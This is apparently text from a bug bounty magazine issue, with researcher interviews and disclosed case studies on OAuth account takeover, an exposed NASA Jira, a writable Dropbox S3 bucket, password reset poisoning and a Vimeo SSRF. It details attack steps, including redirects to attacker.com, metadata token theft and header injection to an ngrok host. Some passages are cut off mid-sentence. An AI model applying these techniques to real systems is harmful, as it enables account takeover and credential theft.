report bugs to companies not having responsible disclosure policies. Hackerone will try their best to
reach out to the right person and share the vulnerability details on your behalf.
[GB]: Yes, I love to use my brain and in fact regard that as one of my favorite tools :). Along with that I
prefer to use Osmedeus tool for recon and Burp suite for inspecting request and response. I love to use
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[GB]: As a beginner, I would advise practicing common vulnerabilities that impact applications. A good
There are several testbeds where you can learn and practice these vulnerabilities. To name a few there
Also, I would recommend getting a monthly subscription for Pentesterlab and completing the essential
badge.
Refer to Hackerone disclosed reports. This is pure gold. See how they report and what kind of
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
GAURANG BHATNAGAR
[GB]: One of my favourite bugs I reported to a private program was bypassing IDOR using parameter
pollution. I was looking out for the IDOR vulnerabilities within the REST-API of the target application.
Unfortunately, none of the endpoints were found to be vulnerable to the traditional IDOR, until I found
that traditional IDORs can be bypassed by supplying the same parameter name multiple times but with
different values.
https://medium.com/@0xgaurang/case-study-bypassing-idor-via-parameter-pollution-78f7b3f9f59d
[H9]: Do you have any thoughts or experiences you would like to share with our
[GB]: It has been more than five years since I started Bug Bounty. During that time, I have observed that
you need to have a lot of patience. You will invest a lot of time and effort in finding a bug that may turn
out to be out of scope or a duplicate. Such situations often lead to burnout. Due to a high number of
increase in bug bounty participants, the competition has also increased. This may often result in several
duplicate reports. The majority of bug bounty hunters have a focus on Web applications. I would highly
suggest choosing targets that are not often tested by the crowd. Targets such as Mobile apps, API’s,
Thick clients and Source code are not often tested by many.
GAURANG BHATNAGAR
A good start would be to gain skills in these areas and start finding vulnerabilities in not so tested
targets.
[CASE STUDY] Gaurang Bhatnagar
OAUTH
MISCONFIGURATION
LEADS TO ACCOUNT
TAKEOVER
74
[CASE STUDY] OAUTH MISCONFIGURATION LEADS
TO ACCOUNT TAKEOVER
Most security vulnerabilities arise within the integration part due to the incorrect implementation of third party
services. Integrating third party OAuth providers are often left misconfigured by developers, which may lead to a
bigger security impact such as account takeover.
While working on a bug bounty program, I found that the target website had a OAuth Misconfiguration that
allowed me to gain access to any user’s account.
It is always recommended that you use two test accounts to test the OAuth misconfiguration flaw. Someone
would definitely not like it if you accidentally end up in another user’s account.
Here I have used two test accounts as part of creating a proof of concept. Naming them: Attacker and gaurang
(Victim)
The website used Google and Facebook Oauth to sign in. As a victim, I signed up and logged into the application via
Google sign in. The following image shows how my profile page looked:
Notice the linked accounts section. Here you can see my Google account is linked with my profile. I have not linked
my Facebook account.
To test the Oauth functionality, I created another account with the name of Attacker. I used another mail id to
register in the application. Here’s how the attacker profile looked:
[CASE STUDY] OAUTH MISCONFIGURATION LEADS
TO ACCOUNT TAKEOVER
In the Linked Accounts section, you can also link your Facebook account by signing into the Facebook app. When
you click on the Connect button, the following request is generated:
As you can see in the request, while linking up your Facebook account, the application sends the ownerBid of the
user who is requesting. Now, what if I replace this ownerBid with someone else’s ownerBid?
As an Attacker, I replaced the OwnerBid parameter with the Victim’s ownerBid (gaurang). As expected, I
found that the attacker’s Facebook profile was linked to the Victim’s profile account.
[CASE STUDY] OAUTH MISCONFIGURATION LEADS
TO ACCOUNT TAKEOVER
Now, the Attacker can sign in using Facebook and will get access to the Victim’s account.
Impact:
The impact was high because the profiles were public and if you see the source code of a public profile you can get
the OwnerBid (which was used to take over the account). The OwnerBid and user_bid were the same.
Moreover, there were many celebrities who had their account on this website. And the above screenshot contains
the OwnerBid/user_bid of a known celebrity. So it was possible for an attacker to get access to any user’s
profile.
Takeaways:
Make sure to properly test the third party integrated services. There is a fair chance that they may not be properly
configured and may become a source of $$$$ for you :).
CHAPTER 13
Gaurang Bhatnagar
Experienced Security Researcher with a demonstrated
history of working in the management consulting industry.
Website/Blog: https://gaurangbhatnagar.com/
Twitter: https://twitter.com/0xgaurang
Linkedin: https://www.linkedin.com/in/iamgaurangbhatnagar
HARMEET
BAWA
[Hakin9 Magazine]: Hello Harmeet! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
[HB]: The best award I received was a bounty for exploiting RCE. It is by far the most satisfying award for
me because it took a lot of time to exploit and made me learn a lot when I was at it. I basically
[HB]: Security is all about practice. Theoretical knowledge can pull you half way into understanding but
the rest is achieved through practice itself. A lot of new people in this field struggle to find a place to
learn exploitations but pointing them to labs and exploitation beds would help them learn it. OWASP
Top 10 is always the place to start with. I would recommend labs of Portswigger to practice for beginners.
[HB]: Beginners usually try to copy tricks from the older security champs but the golden rule is to take the
tips and develop your own tricks as everyone develops a different testing technique. That will also help
you get an edge when you progress further in this field. There are thousands of testers across the world
and to gain that edge is when you think differently, so don’t copy the tricks, just follow the tips!
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[HB]: I don’t. I am more of an open bug hunter. CTFs are like a puzzle and CTFs hence have limited
scopes, not an open approach. With bug bounty, you have the flexibility to explore the entire surface
and look for all kinds of issues, not merely flags or particular results.
HARMEET BAWA
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[HB]: Yes, it is really important to join bug bounty communities since it is the best platform to earn a
reputation among popular security hunters and, on top of that, bug bounty also rewards bounty hunters
with swag, which is the best motivation to stay updated in this community.
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[HB]: The platforms I work with may or may not require an interview. Some have requirements where you
need to show your experience and solve some assessments to receive targets for testing and others are
usually open. Some run private bounty programs and some are cohort based. It is based on a contract
where responsible disclosure is enforced at all times. It is required that the live sites are not targeted if an
issue is found on the ones given for testing, which may be of a staging build or a build released for that
platform. Some kinds of attacks are prohibited that might affect the production backend servers of the
targets.
HARMEET BAWA
[HB]: I like to use a variety of tools for testing whose results I combine with a custom script so that I can
fetch issues that I am targeting. I like using LazyRecon, FFuF, Burp Suite, Shodan, etc.
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[HB]: As a complete beginner, it is advisable to first pick what kind of bounty would you like to do, like
web, mobile, host, source code, etc. It is best to pick one stream and work on it. Approaching platforms
like Bugcrowd, Hackerone, Synack, etc., would be a good idea. Otherwise, you can also independently
search for organizations that award bug bounties to researchers for responsible disclosure like One Plus,
Google, Microsoft, etc. It might not be easy to spot bugs as soon as you start because a lot of
researchers are working on it and many times you will face a duplication. However, keep your calm and
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
[HB]: I am particularly proud of my first bounty. It was a well tested target with more than 100
vulnerabilities reported. I was pretty much hopeless as I was testing it but duplications were plenty as all I
HARMEET BAWA
was finding had already been reported. However, I found one place where XSS payloads had been
added by researchers but they had not somehow executed. I crafted my payload and tested it. It took
me eight tries. Viola! My first bounty of $1000! That was my first bug and it got me absolutely hooked to
[H9]: Do you have any thoughts or experiences you would like to share with our
[HB]: I would say that many times, after spending hours of hard work looking for issues and finding none
or finding issues that are duplicates might be upsetting or make your determination weak, but don’t let it
put you down. Make it your motivation and earn your way to that swag waiting for you at the end. It is
SERVER LEAKS
NASA STAFF
AND PROJECT
DATA!
85
EXPOSED JIRA SERVER LEAKS NASA
STAFF AND PROJECT DATA!
Here, I’ll be talking about an interesting vulnerability that I have found in NASA Jira (an Atlassian task tracking
systems/project management software), or more specifically a misconfiguration issue that caused the leakage of
internal sensitive information of NASA, including their internal user details, project details, employee names,
employees’ mail ids, etc. Let’s see what was the exact issue:
One of the biggest concerns of any company is ensuring that internal information is kept confidential and only
available to specific individuals within and outside of an organization. In other words, by providing security,
integrity and availability of their data (among other aspects), companies can sustain competitive advantage
regarding their development plans, findings, talent employment, etc.
There are a couple of settings in Jira that, when not configured properly, may disclose information about the
application and its users and it can provide unauthorized access to some internal data of the companies to any
other user over the internet. This information may aid an attacker in gaining access to the application.
In Jira, while creating filters or dashboards, it provides some visibility options to be set. The issue was due to the
wrong permissions assigned to them. When the filters or dashboards are set with the visibility to “All users” and
“Everyone”, respectively, instead of sharing with everyone of the organization (which people interpret), it also
shares them publicly. There is also a user picker functionality in Jira that gives a complete list of every user’s
username and email address. This information disclosure is the result of an authorization misconfiguration in
Jira’s Global Permissions settings. Because of the wrong permissions scheme, the following internal information
appeared to be vulnerable:
I found that the Jira instance used by NASA had a misconfigured setting where any anonymous user can access the
user picker functionality (described as above) and pulls out the complete list of every NASA user’s username and
email address.
EXPOSED JIRA SERVER LEAKS NASA
STAFF AND PROJECT DATA!
As can be seen in the above screenshot (first line), there are a total of 1,000 NASA internal user details that were
disclosed by this misconfigured Jira setting.
While this is not as severe as above, it is similar to the browse users issue. NASA’s Jira instance also had a
misconfiguration related to the Filters setting, which lists the most popular filters used to categorize issues and
tasks within the application. It also lists the username of the person who ‘owns’ each of these filters. This will likely
not be a complete list of users like the browse users function, but can glean useful information about how
usernames are formatted. Additionally, it can give an attacker an idea of what kind of information may be housed
within the application and what projects a team is working on along with showing features of different projects.
EXPOSED JIRA SERVER LEAKS NASA
STAFF AND PROJECT DATA!
And this is how, by exploiting a Jira misconfiguration issue, I was able to access sensitive
information of NASA including their internal user details, project details, employee names,
employee mail ids, etc.
Report details:
03-Sept-2018 — Bug reported to the SOC NASA team and CERT US team.
~Logicbomb ( https://twitter.com/logicbomb_1 )
EXPOSED JIRA SERVER LEAKS NASA
STAFF AND PROJECT DATA!
Avinash Jain
I am a cybersecurity researcher working in an Indian E-commerce
company Grofers as a DevSecops Engineer. I love to break
bug bounty journeys. Various articles and interviews have been published in various Security
magazines, newspapers and newsletters like Forbes, Economic times, Huffingtonpost, Hakin9,
Hackerone etc. I am also a cybersecurity speaker, share my views on various infosec threads.
FAIZAL
ABRONI
[Hakin9 Magazine]: Hello Faizal! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
[Faizal Abroni]: Hello, thank you for this opportunity, I am good, very good.
How about you? I hope you have a beautiful day. I am Faizal Abroni, from
[FA]: Before I became a bounty hunter bug, my interest was in the hacking
world. I had a dark past because I was trying to change my grades when I
my ability. So, I tried to find out what I could produce through hacking, and one of the answers was by
[FA]: First, we must have an abnormal mindset. We must "attack" and know the flow of their company
systems that we did not know before. Second, programming skills. It is very important to have
programming skills, otherwise, we will have difficulty reading the system flow and code. Third, network
FAIZAL ABRONI
skills. This capability is needed to find information, starting from the IP address, port, DNS, and others
[FA]: For a beginner, basically all programming languages are the same, only different in their syntax. But
I recommend beginners understand the PHP programming language. If you already understand one
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[FA]: Sometimes I do CTF to learn how to think quickly to solve problems. Usually, I do CTFs on
hackthebox or vulnhub. CTF is needed as a method of thinking fast and thinking out of the box, this
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[FA]: The bug hunter community is very important, because with the community we can exchange ideas,
collaborate with each other. When we are stuck, we can ask for help from them, surely they will help us.
FAIZAL ABRONI
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[FA]: Usually, companies that provide bug bounty programs do not need contracts, only a few companies
need them. The process is very simple; if we join a platform like Hackerone (hackerone.com) or
Bugcrowd (bugcrowd.com), the platform provides a company that opens a bug bounty program, we only
need to register and see the scope of the area that we can start to penetrate. After that, we can report
via the platform. If the company is not on the platform, they usually provide a special form or email to
report bugs.
[FA]: The tools I usually use are amass and nmap. amass and nmap are used for reconnaissance. Then, I
used to use tools at times from Linux but that depends on the conditions like dirbuster to know which
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[FA]: You must understand what a bug bounty is and then learn about the top 10 OWASP, it will really
help to start bug hunting. To find the company, we can join the platform provider of bug bounty
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
[FA]: The best experience I have ever had and that I have never forgotten is that I found a lot of security
holes in one company and they paid me more than $50,000 in less than 2 months from the company.
Muhammad Asim
APPLICATION -
DROPBOX
Hello everyone,
95
THE TARGET APPLICATION - DROPBOX
Today I am going to share my another interesting finding through which I earned $1,500 in just 15 mins.
The target application was Dropbox. I mostly used DropBox to upload and share data because DropBox is one of
the most secure and trusted platforms. But nothing is 100% secure :)
I am going to share a vulnerability that only exists when some applications are using the third party CDN (Content
Delivery Network) like Amazon and Cloudflare, etc., with the ACL (Access control list) not properly configured.
Security misconfiguration is very common and can happen at any level of an application stack. If the security
settings are misconfigured, threat agents — such as external attackers as well as authorized users — may attempt to
compromise the system. Occasionally, such access results in a complete system compromise.
An access control list, with respect to a computer file system, is a list of permissions attached to an object. An ACL
specifies which users or system processes are granted access to objects, as well as what operations are allowed on
given objects. Each entry in a typical ACL specifies a subject and an operation.
A content delivery network or content distribution network is a geographically distributed network of proxy servers
and their data centers. The goal is to provide high availability and high performance by distributing the service
spatially relative to end-users.
An Amazon S3 bucket is a public cloud storage resource available in Amazon Web Services’ (AWS) Simple Storage
Service (S3), an object storage offering. Amazon S3 buckets, which are similar to file folders, store objects, which
consist of data and its descriptive metadata.
I managed to find an Amazon s3 misconfigured bucket of DropBox which allows me to upload, view and
delete any file placed on the bucket.
There are multiple ways to find an associated Amazon S3 bucket of the target application, I will try to share all
possible ways to find the bucket of the target application.
Method # 1:
You can use many online tools available on GitHub to find the S3 bucket of a website. I would like to list a few of
them:
1) Lazy S3
2) bucket_finder
4) sandcastle
5) Mass3
6) Dumpster Diver
7) S3 Bucket Finder
8) S3Scanner
Almost all tools are command line tools. You can clone them from GitHub.
Method # 2:
Check out the server information from wappalyzer (Google Extension) or via the response of any request for the
target application. You can identify whether the target application is using Amazon to store data or not.
Method # 3:
Right click on any image of the target application and open the image in a new tab. If the image URL looks like this:
http://xyz.s3.amazonaws.com/campaign_body_images/images/ac99313b2e85b0dce2006fd997822b9c630cec3e/
b1.gif
It means the target application is storing their data to the Amazon server and the bucket name is “xyz”. Anything
before “.s3" in the URL is the bucket name of the target application.
THE TARGET APPLICATION - DROPBOX
Method # 4:
Use the BURP Suite and spider the target web application. BURP Spider plugin is one my favorite plugins; it 100%
extracts the Amazon bucket of the target application.
Method # 5:
Check HTTP History in BURP Suite during interception and pentesting, BURP captures the Amazon bucket URL
because the images fetch from the Amazon server when you open the website.
These are some common methods to identify the target application using Amazon CDN or not. If you guys know
any other methods or tools then kindly share in the comment section to spread knowledge and make the internet
safer.
To be very honest, it's hard to manage time for bug bounty with a job and if you want to do both things together
then you need to be faster than anyone else.
Finally, I got a free weekend and I decided to do some Bug Bounty. I select DropBox and start working.
Always focus on subdomains of any target application, and try to enumerate the subdomains as much as you can.
Because most of the critical vulnerabilities are triggered on website subdomain, the main/parent domain is
obviously more secure than the application subdomains.
Most of the companies do not focus on their subdomains security, they put all the security control on their
main/parent domain.
I just found a subdomain of DropBox that contains an image and when I open the image via direct link, I observed
it was uploaded on an Amazon bucket.
http://xyz.s3.amazonaws.com/campaign_body_images/images/ac99313b2e85b0dce2006fd997822b9c630cec3e/
b1.gif
then without wasting any time, I opened AWS CLI on Kali Linux and tried to upload/move the file to the DropBox
Amazon bucket and boooooom!!!
It was uploaded on DropBox Amazon bucket and accessed via direct URL :-)
THE TARGET APPLICATION - DROPBOX
I was like:
Celebration time.
https://github.com/aws/aws-cli
Here is the command to list the contents of an Amazon bucket. It only works when the target application does not
disable the directory listing of the Amazon bucket.
aws s3 ls s3://xyz
THE TARGET APPLICATION - DROPBOX
Here is the command to move or upload the file to Amazon bucket. It only works when a proper ACL is not applied.
To verify you can access your file via direct URL The uploaded file may contain some malicious script, phishing
login panels or any virus, etc.
Remediation:
Apply proper ACL, disable write permission to avoid uploading the file from an external user.
Disable directory listing to avoid viewing the content of the Amazon bucket.
Make sure to apply the proper policies on buckets and objects to handle the CORS request securely.
years experience.
He has hunted more than 500 international companies including Microsoft, Facebook,
Google, Snapchat, Dropbox, Salesforce etc. Listed on the top hundred hackers of World's
biggest hackers community (HackerOne) and also the part of world's biggest Red Team
(Synack).
[Hakin9 Magazine]: Hello Vishal! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
So I went to college and I decided to switch to the Cybersecurity field. I learned so many things about
Cybersecurity. First, I didn't know about the Bug Bounty. When I decided to go into Core Application
Security, I learned about bug bounties. So I mainly focused on Web Applications as well as Android and
iOS applications. Then started the Bug Bounty and earning lots of money.
VISHAL BHARAD
[VB]: There are many resources, you have to explore yourself in this field because every day new
vulnerabilities are discovered by Security Researchers. You have to learn basic principles from the
internet, like Youtube, Videos, POC, blogs written by security researchers, and paid bug bounty courses.
Mainly, you can explore the new bugs on Hackerone.com in the hacktivity tab. After learning the basics, I
prefer hackerone.com to explore and I have also discovered a bug recently and got the CVE ID, which is
CVE-2020-7993.
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[VB]: Yes, I also participate in CTFs. Actually, for the preparation of OSCP, I have participated in CTF on
Hack The Box and there are also other resources like vulnhub. In Hack the box, you clear all your
network, as well as web application, level vulnerabilities and how to exploit them, which is very useful for
preparation of OSCP. In vulnhub, it’s the same as hack the box but here already given machines are there
and there are so many write ups about it. So If you’re stuck anywhere, exploiting a vulnerability, the write
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[VB]: Yes, If you want to learn and explore you need to join bug bounty communities.
[H9]: Do you know any good communities you would like to recommend?
[VB]: There are many, like Hackerone.com, bugcrowd.com, synack, cobalt.io, yeswehack.com,
intigriti.com, etc.
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[VB]: Actually, it depends on the company. We do not form any relationship with the company we report
bugs to. So it depends on the company, like If you report multiple bugs on any company, they may hire
you to do penetration testing on their websites and applications and they also pay for it. And this all
depends on the Responsible Disclosure of the websites. If there is no responsible disclosure present you
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[VB]: First start with the basics in which basic networking knowledge is a must. Then start the course or
any resources available on the internet about the Network Penetration Testing. All the network
vulnerabilities and its impacts and how to exploit etc. Then explore and learn about the each and every
vulnerability of the Web Application and try to practice it on the live website so Bug Bounty platform is
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
[VB]: Yes I have many Stories of bug bounties. I have created a blog for this so whenever I get time, I
write about my findings. https://medium.com/@vbharad please check this for the bug bounty stories.
CHAPTER 18
[H9]: Do you have any thoughts or experiences you would like to share with our
[VB]: Yes, security is a very big platform and nowadays, all things are connected with the internet. So
wherever the internet is, there are large possibilities to hack or data breach. So be an ethical hacker to
107
ACCAOUNT TAKEOVER THROUGH
PASSWORD RESET POISONING
To try to discover the bug, I tested many tricks on the website Assume redacted.com. I decided to try to find some
bugs on the Forgot Password Page.
I tried on many pages for about 6 to 8 hours. Then after so many attempts I have found a big and interesting
vulnerability which leads to Full Account Takeover
• Burp Suite
• Ngrok Server
Steps to Reproduce:
Here, the token is leaked to bing.com. Now, to confirm if this token is true or not, put
https://redacted.com instead of https://bing.com and open in the browser.
4. So the password reset link is valid and I am able to reset the password.
Exploitation:
After this, I decided to show how hackers can exploit this bug.
Then the Attacker goes to the forgot password page, which is https://redacted.com/users/forgot_password and
types the Victim’s username and captures the request in Burp Suite.
In the captured request, the Attacker adds “X-Forwarded-Host: ngrok.io” ngrok.io=ngrok server address.
So after that, the Victim can get the Password reset URL and the domain of that reset link is ngrok server address
or domain. (For the exploitation, it needs victim interaction for one time click only.)
ACCAOUNT TAKEOVER THROUGH
PASSWORD RESET POISONING
Whenever the victim clicks on that link, the Attacker can get the full token in his server:
When the attacker gets the password reset token, he will only change the ngrok domain name to Main Domain to
Takeover the Account.
Thank You!
Disclosure:
They saw the report, steps to reproduce, and PoC (Screenshots, Videos).
Vishal Bharad
Security Researcher, Web Application Pentester,
VAPT, Bug Bounty Hunter.
Linkedin Profile -
https://www.linkedin.com/in/vishal-bharad-b476b388
EKA
SYAHWAN
Ke e p l e a r n i n g a n d
[Hakin9 Magazine]: Hello Eka! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
[Eka Syahwan]: Hi everyone, I’m Eka Syahwan and I come from Indonesia, a country that I love. I am a
The community that I currently founded BUGHUNTER ID (bughunter-id.org) is a great place for everyone
to join, for all groups of experts and even those who are just learning about bounty bugs. It's likely that I
You can find and connect with me via Linkedin. I am very happy to be able to connect with you.
https://github.com/radenvodka
https://www.linkedin.com/in/ekasyahwan
[ES]: Before I got into bug bounty hunting, I was a programmer and I was a person who joined many IT
security communities in Indonesia. From the start I was a programmer and the many communities that I
joined began to hunt for bounty bugs and from that experience I became an IT security activist.
EKA SYAHWAN
[H9]: Can you tell us more about those communities? What is their main purpose
[ES]: For now (because the forum is not ready yet), I have created a Facebook group
immediately.
[ES]: To begin the career of the gift of bugs, we must learn the basic techniques that must be carried out,
including:
• Network basics
One should know the basics of learning HTML, PHP, and Javascript. I returned to make my own web
application and started searching to find the web application. From various websites you learn
[H9]: Do you have a favorite website or book which you used to learn more about
[ES]: I would suggest looking for it on Google or maybe you can take an online course at coursera.org.
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[ES]: In 2016, I created a platform for CTF players, but I was never a participant in CTF competitions in
Indonesia. However, I was once on a committee at one of the CTF events at Satya Wacana Christian
University.
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[ES]: The bounty bug community is the right place and all who want a career in the bug bounty field
should join the community. By joining the community, there will be lots of information about the
development of bug bounties, the latest techniques, and other things that help career bug bounty
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[ES]: All I have tried, usually a company will contact me and offer a bug bounty program that they make
privately on the bug bounty platform they use. Don't ask for the possibility that you will be contracted by
the company.
Otherwise, I contact the company to work together or you can use platforms like hackerone.com,
[ES]: The tool that I like is, of course, the tool that I made myself. But I usually need some tools that
https://github.com/hacktdev because hacktdev will make it easier for everyone to get Hacking Tools &
Penetration testing.
EKA SYAHWAN
[H9]: Do you have any thoughts or experiences you would like to share with our
[ES]: 2020 is a year where many companies will need someone like you who is interested in the bounty
bug program.
"Everyone can be a bug prize hunter, we are all given the brain (mind) to think that intelligence is not
Keep learning and trying, because even a security expert starts from studying.
Maybe on some platforms there are assessment standards where the assessment will lead you to the
private bug bounty. If you report a vulnerability and your report is rejected, then make it a lesson. Value is
117
VIMEO SSRF WITH CODE EXECUTION
POTENTIAL
Recently I discovered a semi responded SSRF on Vimeo with code execution possibility. This blog post explains
how I found and exploited it. So let's get started.
Background
Vimeo provides an API console for their API called API Playground. The requests made using this web app are
done from the server-side. Take the below request as an example.
Base request
https://api.vimeo.com/users/{user_id}/videos/{video_id}
If you look closely at the request, we control quite a few things here. First the uri parameter, which is the endpoint
to hit on endpoint, in this case is /users/{user_id}/videos/{video_id} , request method in this case is set
to GET , params which are supposed to be post parameters if the request method is POST. user_id & video_id are
the kind of variables whose values get defined in the segments parameter.
I first tried to change the URI parameter to my custom path, however, any change in the URI will result in a 403,
which means that they’re allowing a set of API endpoints. However, changing the value of variables such as user_id
& videos_id is possible because they’re intentional and because these values reflect in the path of the URL. Passing
../../../ will result in a request to ROOT of api.vimeo.com
URL.parse(“https://api.vimeo.com/users/1122/videos/../../../attacker”)
Result: https://api.vimeo.com/attacker
As you can see in the response, all the endpoints of api.vimeo.com are listed, which are the root response of
api.vimeo.com if you make an authenticated request (with authorization header).
Well, I figured that this is following HTTP 30X redirects. It’s a long story that took a little bit of logical thinking.
Back to the point, now that I know this is following HTTP redirects and we’re good to move forward, we need an
open redirect so that we can redirect the server to our controlled asset.
A minute of content discovery and I came across an endpoint on api.vimeo.com which makes a redirection to
vimeo.com with our controlled path on vimeo.com
https://api.vimeo.com/m/something
VIMEO SSRF WITH CODE EXECUTION
POTENTIAL
api.vimeo.com to vimeo.com
Cool, now we have a wide scope to find an open redirect. I have a not very useful open redirect on vimeo.com, so I
won't be disclosing its details but let's just assume it is something like this:
https://vimeo/vulnerable/open/redirect?url=https://attacker.com
../../../m/vulnerable/open/redirect?url=https://attacker.com
Passing this value inside video_id will parse URL in this way
https://api.vimeo.com/users/1122/videos/../../../m/vulnerable/open/redirect?url=http
s://attacker.com
https://api.vimeo.com/m/vulnerable/open/redirect?url=https://attacker.com
https://vimeo.com/vulnerable/open/redirect?url=https://attacker.com
https://attacker.com
VIMEO SSRF WITH CODE EXECUTION
POTENTIAL
SSRF Achieved, Redacted details regarding the open redirect and my domain.
The server expects a JSON response and parses it and shows in response.
Exploiting.
As Vimeo infrastructure is on Google cloud, my first attempt was to hit the Google metadata API. I followed the
approach taken by André Baptista (0xacb).
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/de
fault/token?alt=json
Scope of token.
$ curl
https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA
Response:
https://www.googleapis.com/auth/devstorage.read_write
https://www.googleapis.com/auth/monitoring", "expires_in": 2443, "access_type": "offline" }
I could then use this token to add my public SSH key to the instance and then connect via my private key.
Response:
And…
keys added
However, the SSH port was open on the internal network only :(( but this was enough to prove that internally this
can be escalated to shell access.
Kubernetes keys were also extracted from metadata API, but for some reason, I was not able to use them, although
the Vimeo team did confirm they were valid.
Due to my work and involvement with Vimeo, I was allowed to go deeper than I would normally
have been allowed.
VIMEO SSRF WITH CODE EXECUTION
POTENTIAL
That’s it, folks. I hope you liked this. Share/Retweet is much appreciated, Have any questions regarding this? DM
@ rootxharsh
Thanks to:
Brett (bbuerhaus) for his write up about this SSRF (he and Ben have some lit AF writeups).
Timeline
28th Jan: Vimeo team rewarded initial $100 and pushed a temporary fix.
Harsh Jaiswal
Working in the Infosec domain from the last 5 years. My area of interest, in particular,
is web application security.
[Hakin9 Magazine]: Hello Rakesh! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
[Rakesh Mane]: Hi, My name is Rakesh Mane. I’m from India and I’ve
been into bug hunting for the last 5+ years. My normal day goes by
Bugcrowd.
in web browsers.
[RM]: I always had the curiosity of understanding how software works. So I started learning coding,
coding looked okay but I wanted to go one level deeper so I started learning the basics of reverse
engineering. It was fun to just modify the applications to change its behavior. Then I moved to web
applications, learned how to develop web apps, then started doing web CTF challenges.
One day, one of my Facebook friends posted a pic with his bounty amount, that was the first time I got to
know about the bug bounties. So I started applying whatever I learned previously in the bug bounty
RAKESH MANE
programs. Luckily, my very first bug that I reported got accepted and rewarded. It was very motivating for
me so I started spending more and more time on it. This is how I got into the Bug Bounty hunting game.
;)
[RM]: In order to get good at bug hunting you need to first pick what kind of applications interest you, for
example, web apps, mobile apps, thick client apps, etc. Usually, many people start by learning web
application security. So for improving your web app security skillset, you can go through the resources
below:
• https://bugbountyforum.com/getting-started/intro/
• https://portswigger.net/web-security
• https://pentesterlab.com/pro
• https://overthewire.org/wargames/
• https://www.root-me.org/en/Challenges/
Once you get good with web security, then explore the other areas also.
RAKESH MANE
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[RM]: Yes, I do. You can find listings of many CTF events on https://ctftime.org/ but usually they run only
for a few days. It’s very challenging but also fun to solve the challenges in a limited time.
There are many ongoing CTF challenges that progress through levels. Some of them are listed below.
They have CTF challenges from various categories (web, binary, stegno, etc.).
• https://www.root-me.org/en/Challenges/
• https://ringzer0ctf.com/challenges
• https://overthewire.org/wargames/
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[RM]: If you want to be really good in bug hunting then you should definitely be active in bug bounty
communities. Although it’s not compulsory, it helps in keeping yourself updated with new attack vectors,
bugs, etc. Most of the great bug hunters are active on Twitter so just follow them and try to stay active on
Twitter.
RAKESH MANE
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[RM]: Usually you just submit a vulnerability (bug) with steps to reproduce (proof of concept) then the
relevant person (analyst) from the company reproduces it (if it’s not already reported by someone else)
then the company rewards a bounty (as per bug bounty program policy) to the reporter.
Sometimes, if the analyst doesn’t understand the vulnerability that you reported, he can ask for
additional information or help from the reporter so cooperation is needed throughout the process.
Bug hunting is not based on a contract. You just pick any program that you like and start hacking. If you
find any bugs, then you’ll get a reward, if you don’t find any bugs, you’ll get nothing.
We don’t always form relations with the companies, but I have seen many people forming great
relationships with the companies, some of them even got hired by the companies.
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[RM]: First step is to learn the basics. Most of bug bounty programs have only web applications in scope
so understand the architecture of web applications, learn programming languages (Php, Python, Ruby,
NodeJS, Javascript, ASP, JSP), HTML, web protocol standards (HTTP, WebSocket, etc.).
Once the basics of the web are clear, you can move towards attacking For general understanding of web
